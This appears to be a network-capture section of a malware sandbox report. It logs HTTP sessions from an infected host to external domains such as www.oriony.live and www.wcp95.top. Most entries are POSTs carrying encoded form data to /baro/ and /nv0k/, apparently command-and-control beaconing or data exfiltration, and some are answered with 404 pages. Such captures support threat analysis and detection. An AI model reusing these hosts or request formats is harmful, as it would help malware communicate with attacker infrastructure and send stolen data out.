                                                                                                Data Raw: 49 42 51 50 3d 4f 35 61 73 4b 64 31 74 4c 77 63 78 73 36 77 34 4b 4b 46 55 63 77 76 34 38 7a 50 75 61 34 4f 74 63 52 77 34 49 4f 72 46 68 74 69 2b 51 4a 36 53 35 66 41 6c 31 59 48 35 50 30 31 39 76 72 68 62 36 4d 77 78 47 72 7a 6c 48 56 6c 53 72 4b 6a 71 63 51 44 78 33 57 57 41 46 2b 52 78 58 6c 47 2f 65 52 48 62 6c 54 32 36 64 53 4b 62 32 31 65 36 41 37 64 5a 39 32 2f 73 63 4d 4f 47 6b 6a 41 4b 2b 65 33 44 62 5a 5a 70 49 44 47 4a 75 58 69 77 70 63 6b 4b 73 45 2f 47 38 4c 57 30 61 48 78 4c 78 74 33 66 57 6b 65 6d 42 44 62 6d 63 4b 70 43 4d 4c 77 58 62 63 2f 42 38 46 4e 56 59 4a 4b 39 38 67 3d 3d
                                                                                                Data Ascii: IBQP=O5asKd1tLwcxs6w4KKFUcwv48zPua4OtcRw4IOrFhti+QJ6S5fAl1YH5P019vrhb6MwxGrzlHVlSrKjqcQDx3WWAF+RxXlG/eRHblT26dSKb21e6A7dZ92/scMOGkjAK+e3DbZZpIDGJuXiwpckKsE/G8LW0aHxLxt3fWkemBDbmcKpCMLwXbc/B8FNVYJK98g==
                                                                                                Nov 11, 2024 17:05:43.224169016 CET533INHTTP/1.1 404 Not Found
                                                                                                Date: Mon, 11 Nov 2024 16:05:43 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                71192.168.11.2049822192.64.118.22180
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:05:45.734800100 CET773OUTPOST /baro/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.oriony.live
                                                                                                Origin: http://www.oriony.live
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 221
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.oriony.live/baro/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 4f 35 61 73 4b 64 31 74 4c 77 63 78 74 62 67 34 49 70 74 55 55 77 76 37 67 44 50 75 54 59 4f 78 63 52 73 34 49 4c 4c 56 67 65 47 2b 51 6f 71 53 34 61 73 6c 35 34 48 35 63 30 31 34 77 62 68 71 36 4d 30 58 47 72 50 6c 48 56 42 53 72 4f 6e 71 63 6a 62 32 32 47 57 43 63 75 52 7a 55 56 47 2f 65 52 48 62 6c 54 53 63 64 54 69 62 32 41 4f 36 42 61 64 61 68 6d 2f 72 4b 38 4f 47 31 54 41 4f 2b 65 32 57 62 59 46 50 49 42 4f 4a 75 53 47 77 6e 74 6b 4e 6e 45 2f 41 7a 72 58 64 65 43 73 6e 35 2f 43 6f 62 46 71 54 45 68 62 62 64 63 6b 59 52 35 45 7a 59 50 6a 7a 34 31 30 39 61 4c 4c 6d 68 6f 49 4e 70 55 54 7a 55 51 73 47 46 2f 59 52 43 2f 75 61 74 69 38 3d
                                                                                                Data Ascii: IBQP=O5asKd1tLwcxtbg4IptUUwv7gDPuTYOxcRs4ILLVgeG+QoqS4asl54H5c014wbhq6M0XGrPlHVBSrOnqcjb22GWCcuRzUVG/eRHblTScdTib2AO6Badahm/rK8OG1TAO+e2WbYFPIBOJuSGwntkNnE/AzrXdeCsn5/CobFqTEhbbdckYR5EzYPjz4109aLLmhoINpUTzUQsGF/YRC/uati8=
                                                                                                Nov 11, 2024 17:05:46.037164927 CET533INHTTP/1.1 404 Not Found
                                                                                                Date: Mon, 11 Nov 2024 16:05:45 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                72192.168.11.2049823192.64.118.22180
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:05:48.564104080 CET1289OUTPOST /baro/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.oriony.live
                                                                                                Origin: http://www.oriony.live
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 7369
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.oriony.live/baro/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 4f 35 61 73 4b 64 31 74 4c 77 63 78 74 62 67 34 49 70 74 55 55 77 76 37 67 44 50 75 54 59 4f 78 63 52 73 34 49 4c 4c 56 67 65 4f 2b 51 36 79 53 35 39 34 6c 34 34 48 35 48 55 31 35 77 62 68 4e 36 4d 4d 54 47 72 43 61 48 58 4a 53 74 72 7a 71 61 53 62 32 38 47 57 43 42 2b 52 77 58 6c 47 6d 65 52 58 66 6c 54 69 63 64 54 69 62 32 42 2b 36 48 4c 64 61 6a 6d 2f 73 63 4d 4f 4b 6b 6a 41 6d 2b 65 2b 47 62 59 78 35 4a 78 75 4a 75 79 57 77 71 37 49 4e 34 30 2f 43 36 37 58 46 65 43 6f 34 35 2f 50 52 62 47 32 71 45 6d 50 62 66 4c 31 64 43 4b 30 2f 47 75 2f 57 38 30 49 72 57 70 72 4a 35 6f 34 66 2f 47 7a 45 58 51 35 56 4b 49 30 48 53 76 79 6a 34 56 35 73 68 72 49 72 39 65 6a 2f 35 38 55 4e 77 42 75 44 67 78 59 71 70 6c 44 55 41 74 63 78 74 79 6e 78 32 2f 4d 7a 34 46 30 6c 68 6d 31 33 6d 5a 46 6e 4d 45 6a 50 51 43 5a 4f 66 39 59 64 6a 77 2f 6b 65 77 57 67 34 39 68 2f 37 65 78 54 48 32 33 50 74 64 4e 41 38 49 38 34 37 47 6c 37 2f 70 71 58 4b 6e 68 33 53 75 6a 69 44 6c 31 77 62 49 63 78 79 46 68 30 69 [TRUNCATED]
                                                                                                Data Ascii: IBQP=O5asKd1tLwcxtbg4IptUUwv7gDPuTYOxcRs4ILLVgeO+Q6yS594l44H5HU15wbhN6MMTGrCaHXJStrzqaSb28GWCB+RwXlGmeRXflTicdTib2B+6HLdajm/scMOKkjAm+e+GbYx5JxuJuyWwq7IN40/C67XFeCo45/PRbG2qEmPbfL1dCK0/Gu/W80IrWprJ5o4f/GzEXQ5VKI0HSvyj4V5shrIr9ej/58UNwBuDgxYqplDUAtcxtynx2/Mz4F0lhm13mZFnMEjPQCZOf9Ydjw/kewWg49h/7exTH23PtdNA8I847Gl7/pqXKnh3SujiDl1wbIcxyFh0iFm+CjNk491sIf3TA6RCeuKupf+kq/tT3rKqWxJvci8p/w/RQfxBVrRciFJXOS/lWL1t3CNnOAN46ihy41+J6ORfO7KOq0+BRlwMIn58qYG55lcMVTv3edAm+FlH9QX6+guNUxeqjPDZaDKcQen+q+eDyhCwIBR79bT1UNXUNFFNc/0mGctRJTrO+EDtGAVCtIWSjIqlTu+p8cCw1c6LpFHoeE+nHUtSNkCWgy2owK9HqG0DDY1zveBIgztUF4Nq8aOPGDcg0Ol/MPRJWrqTLiWO36WIPL9p4afJ7bNT8iBv1yEKUyyE0y3sLVN2+z6qoV13ZC5yHmFDLgcSmFQwYbMGKkg01BMYeoM2r4qdSswjjb50Qu+8mG82qQHbW3LTK8wsSxmOSBGE8Le
                                                                                                Nov 11, 2024 17:05:48.564162016 CET6633OUTData Raw: 48 6b 6b 39 6b 74 5a 4e 78 56 77 6c 57 67 46 2f 51 63 70 38 6b 45 48 6e 53 48 46 58 78 45 72 72 44 37 36 52 36 4d 47 66 4f 4b 2b 4a 2f 68 48 66 4e 57 30 52 66 47 55 54 70 39 31 6a 65 7a 78 4a 73 78 68 36 31 70 42 2f 58 39 43 6f 32 46 2f 65 5a 64
                                                                                                Data Ascii: Hkk9ktZNxVwlWgF/Qcp8kEHnSHFXxErrD76R6MGfOK+J/hHfNW0RfGUTp91jezxJsxh61pB/X9Co2F/eZdcoDIjbTeKIdhbiMszcqmag9FWBZMbPFOgA/loCYxBzw0/1VSM0Np9Ag9l9OpPnxzOLmuTuILNkq52nccpdW9ksJ/E37QRaX4qgJC0sgLhu+SoVdWF4jdCIz4gcybNk4+pCAks877uMwHv2vlp3qkAWJXbd76vQJqB
                                                                                                Nov 11, 2024 17:05:48.873466015 CET533INHTTP/1.1 404 Not Found
                                                                                                Date: Mon, 11 Nov 2024 16:05:48 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                73192.168.11.2049824192.64.118.22180
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:05:51.387305021 CET495OUTGET /baro/?IBQP=D7yMJrJ+Bz0juplqGbpVYA283ArNTbOObR02L6PPq/HBNKim//Ru1diaK3xlwJ9I24oBUaKRGGlFo6D1EDnpzzz5D4RzRliFajrOrAWZbQXn8yCyBaZzqS4=&Lr3=uHMLTHRPCpsdapr HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Language: en-us
                                                                                                Host: www.oriony.live
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Nov 11, 2024 17:05:51.694986105 CET548INHTTP/1.1 404 Not Found
                                                                                                Date: Mon, 11 Nov 2024 16:05:51 GMT
                                                                                                Server: Apache
                                                                                                Content-Length: 389
                                                                                                Connection: close
                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                74192.168.11.2049825154.23.184.9580
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:05:57.039556026 CET747OUTPOST /nv0k/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.wcp95.top
                                                                                                Origin: http://www.wcp95.top
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 201
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.wcp95.top/nv0k/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 57 2f 5a 42 31 48 52 33 6d 50 54 71 77 44 75 32 69 6d 50 6f 53 67 37 37 79 61 4a 57 37 5a 6f 31 50 75 62 78 49 33 4c 35 7a 4a 69 44 6a 44 69 61 44 78 4f 35 5a 34 36 64 4f 77 59 68 5a 4a 7a 37 48 33 30 30 62 32 42 2b 6c 2b 61 32 36 6a 69 36 77 64 32 41 61 47 2b 35 38 58 44 61 76 55 53 73 39 56 61 79 36 42 4d 44 30 37 62 46 45 67 72 4e 62 6a 59 75 47 4c 34 35 2b 50 64 74 46 2f 4f 56 70 4e 45 6d 55 7a 4b 41 66 56 4c 44 6f 69 43 71 62 7a 44 47 4e 35 59 65 55 44 44 46 47 37 6f 46 34 71 37 68 55 77 64 6b 69 4d 6f 67 47 4a 64 74 47 70 4e 58 54 2f 72 45 63 52 53 6f 6b 43 53 35 64 51 3d 3d
                                                                                                Data Ascii: IBQP=W/ZB1HR3mPTqwDu2imPoSg77yaJW7Zo1PubxI3L5zJiDjDiaDxO5Z46dOwYhZJz7H300b2B+l+a26ji6wd2AaG+58XDavUSs9Vay6BMD07bFEgrNbjYuGL45+PdtF/OVpNEmUzKAfVLDoiCqbzDGN5YeUDDFG7oF4q7hUwdkiMogGJdtGpNXT/rEcRSokCS5dQ==
                                                                                                Nov 11, 2024 17:05:57.371517897 CET312INHTTP/1.1 404 Not Found
                                                                                                Server: nginx
                                                                                                Date: Mon, 11 Nov 2024 16:05:57 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 148
                                                                                                Connection: close
                                                                                                ETag: "66a747c1-94"
                                                                                                Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                75192.168.11.2049826154.23.184.9580
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:05:59.893410921 CET767OUTPOST /nv0k/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.wcp95.top
                                                                                                Origin: http://www.wcp95.top
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 221
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.wcp95.top/nv0k/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 57 2f 5a 42 31 48 52 33 6d 50 54 71 79 6a 2b 32 6c 42 37 6f 44 77 37 38 33 61 4a 57 78 35 70 79 50 75 6e 78 49 79 79 69 7a 63 4b 44 6a 68 71 61 43 31 61 35 51 6f 36 64 57 67 59 6f 64 4a 7a 47 48 33 34 61 62 33 39 2b 6c 2b 65 32 36 69 79 36 77 71 71 44 61 57 2b 6e 77 33 44 59 68 30 53 73 39 56 61 79 36 42 5a 55 30 37 7a 46 48 51 37 4e 59 48 4d 74 46 4c 34 32 7a 66 64 74 42 2f 4f 5a 70 4e 45 2b 55 79 47 71 66 54 50 44 6f 69 53 71 62 42 72 48 48 35 59 59 61 6a 43 75 4b 34 30 49 30 49 37 4d 54 43 63 35 37 2f 38 2f 44 66 51 33 62 62 35 7a 51 73 33 32 59 68 72 41 6d 41 54 69 41 56 4d 66 37 43 44 52 54 4b 6f 47 6c 61 54 71 50 2b 50 56 4f 6d 6b 3d
                                                                                                Data Ascii: IBQP=W/ZB1HR3mPTqyj+2lB7oDw783aJWx5pyPunxIyyizcKDjhqaC1a5Qo6dWgYodJzGH34ab39+l+e26iy6wqqDaW+nw3DYh0Ss9Vay6BZU07zFHQ7NYHMtFL42zfdtB/OZpNE+UyGqfTPDoiSqbBrHH5YYajCuK40I0I7MTCc57/8/DfQ3bb5zQs32YhrAmATiAVMf7CDRTKoGlaTqP+PVOmk=
                                                                                                Nov 11, 2024 17:06:00.220974922 CET312INHTTP/1.1 404 Not Found
                                                                                                Server: nginx
                                                                                                Date: Mon, 11 Nov 2024 16:06:00 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 148
                                                                                                Connection: close
                                                                                                ETag: "66a747c1-94"
                                                                                                Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                76192.168.11.2049827154.23.184.9580
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:06:03.116106987 CET2578OUTPOST /nv0k/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.wcp95.top
                                                                                                Origin: http://www.wcp95.top
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 7369
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.wcp95.top/nv0k/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 57 2f 5a 42 31 48 52 33 6d 50 54 71 79 6a 2b 32 6c 42 37 6f 44 77 37 38 33 61 4a 57 78 35 70 79 50 75 6e 78 49 79 79 69 7a 61 53 44 6a 30 6d 61 44 58 79 35 4b 6f 36 64 66 41 59 74 64 4a 7a 68 48 33 51 57 62 33 78 45 6c 38 57 32 31 69 75 36 32 66 65 44 56 57 2b 6e 74 6e 44 5a 76 55 53 31 39 56 4b 32 36 42 4a 55 30 37 7a 46 48 53 7a 4e 4d 44 59 74 4a 72 34 35 2b 50 64 70 46 2f 50 45 70 4e 4d 75 55 79 53 51 59 69 7a 44 6f 44 69 71 49 69 44 48 61 4a 59 61 58 44 43 32 4b 34 35 49 30 4c 66 41 54 43 5a 73 37 38 73 2f 50 6f 6c 78 4a 49 46 35 44 74 62 55 55 56 6e 4e 68 52 48 52 65 43 55 33 2b 68 50 6c 58 74 4d 2f 71 35 37 66 58 63 54 72 56 44 4a 48 38 41 4b 72 32 54 67 2b 73 7a 41 75 43 55 54 63 49 66 62 44 79 6a 61 32 47 65 48 52 6f 43 62 49 38 71 58 73 42 47 44 38 75 51 66 67 6a 71 30 4a 5a 71 38 6f 4d 63 57 46 45 4d 41 37 63 4e 31 7a 32 2b 54 73 6a 52 63 53 4d 42 6c 6e 7a 65 72 44 59 30 65 51 6d 31 36 75 72 65 5a 4f 74 6e 48 36 4c 6c 76 4d 35 74 75 38 41 64 38 38 42 49 2f 61 39 56 65 2f 49 [TRUNCATED]
